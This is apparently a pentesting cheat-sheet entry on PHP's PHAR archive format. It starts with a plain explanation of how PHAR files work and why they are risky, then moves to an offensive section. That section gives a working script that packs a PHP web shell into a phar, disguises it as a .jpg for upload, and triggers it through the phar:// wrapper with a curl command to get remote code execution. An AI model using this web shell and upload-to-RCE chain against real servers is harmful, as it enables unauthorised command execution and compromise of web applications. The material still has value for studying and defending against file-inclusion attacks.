PHAR

The PHAR file type is a PHP Archive format designed to package an entire PHP application or library into a single distributable file. Similar in concept to Java’s JAR or Python’s PEX, a PHAR bundles PHP scripts, metadata, and other resources in a compressed archive that can be executed directly by the PHP interpreter. This structure simplifies deployment by allowing developers to distribute one file instead of multiple dependencies, while still supporting compression methods such as gzip or bzip2 to reduce size.

Internally, a PHAR file consists of a manifest that describes the archive contents, followed by the actual files that make up the application. A stub script at the beginning of the archive is executed automatically when the PHAR is invoked, acting as the entry point of the application. Because PHAR files can embed executable PHP code, they provide powerful packaging capabilities but also carry inherent security risks. Improperly validated or untrusted PHAR files may be abused to deliver malicious code, particularly in scenarios where deserialization of PHAR metadata occurs.

PHAR WRAPPER

The phar:// wrapper can be used to achieve RCE. The script below can be compiled into a phar file that when called would write a web shell to a shell.txt sub-file, which can be then accessed using /:

shell.php

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

# Compile the script into a phar file called 'shell.jpg'
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

# Upload -> RCE (URL-encode '/' -> %2F)
curl http://<ip:port>/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id